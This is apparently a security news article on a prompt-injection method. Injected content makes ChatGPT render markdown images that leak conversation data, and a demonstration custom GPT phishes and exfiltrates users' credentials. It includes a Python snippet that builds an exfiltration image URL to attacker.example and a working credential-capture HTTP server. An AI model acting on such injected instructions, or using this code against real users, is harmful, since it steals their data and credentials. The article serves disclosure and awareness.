
Artificial Intelligence

Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors can create custom GPTs that can phish for credentials and exfiltrate them to external servers. 


Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images. 

They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user’s conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker’s website. The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code. In both cases, the markdown image processed by the chatbot — which can be an invisible single-pixel image — is hosted on the attacker’s site.
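The article does not reproduce the researchers' payloads, but the mechanism can be sketched in a few lines. In this purely illustrative Python snippet (the `attacker.example` endpoint and `log.png` path are hypothetical), the injected instructions would tell the chatbot to emit a markdown image whose URL carries the stolen text, so that simply rendering the image delivers the data to the attacker's server:

```python
from urllib.parse import quote

# Hypothetical attacker-controlled logging endpoint (illustrative only).
ATTACKER_ENDPOINT = "https://attacker.example/log.png"

def build_exfil_markdown(stolen_text: str) -> str:
    """Embed data in the query string of a markdown image URL.

    When a chatbot renders this markdown, the client fetches the image,
    sending the URL-encoded data to the attacker's server. Serving a 1x1
    transparent pixel keeps the image invisible to the victim.
    """
    return f"![]({ATTACKER_ENDPOINT}?q={quote(stolen_text)})"

print(build_exfil_markdown("sensitive text from the conversation"))
```

The key point, as the researchers described it, is that the model itself is tricked into constructing this markdown from conversation content; no traditional exploit is needed, only rendered output.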

ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing. 

Rehberger said similar issues were found in chatbots such as Bing Chat, Google’s Bard and Anthropic’s Claude, whose developers released fixes. 

The researcher noticed this week that OpenAI has also started taking action to tackle the attack method. The mitigations have apparently only been applied to the web application — the attack still works on mobile apps — and they don’t completely prevent attacks. However, the researcher described it as a “step in the right direction”.


On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. 


OpenAI announced in November that ChatGPT Plus and Enterprise users would be allowed to create their own GPTs, custom versions of the chatbot tailored to specific tasks or topics. 

Rehberger created a GPT named ‘The Thief’ that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim’s knowledge. 

This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a ‘personalized experience’ and the user’s password as part of a ‘security process’. The provided information is then sent to the attacker’s server. 
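Rehberger has not published the server code behind ‘The Thief’, but the receiving end of such an attack requires very little infrastructure. As an illustration only, the following minimal Python sketch (all names and paths hypothetical) shows a local HTTP endpoint that captures credentials from the query string of any request a malicious GPT is instructed to send:

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

captured = []  # records harvested from incoming requests

class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Parse requests like /collect?email=...&password=... that the
        # GPT is tricked into sending on the victim's behalf.
        params = parse_qs(urlparse(self.path).query)
        captured.append({k: v[0] for k, v in params.items()})
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # silence default request logging
        pass

def run_server(port: int = 0) -> HTTPServer:
    """Start the capture server on localhost; port 0 picks a free port."""
    server = HTTPServer(("127.0.0.1", port), ExfilHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

The simplicity of this receiving side underscores the researcher’s point: once a custom GPT can make outbound requests, exfiltration is trivial, and the victim sees nothing beyond the chatbot’s normal conversation flow.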

The researcher also showed that an attacker may be able to publish such a malicious GPT on the official GPT Store, despite OpenAI having implemented a review system designed to prevent the publishing of obviously malicious GPTs. 

SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds. 

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Simple Attack Allowed Extraction of ChatGPT Training Data

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.



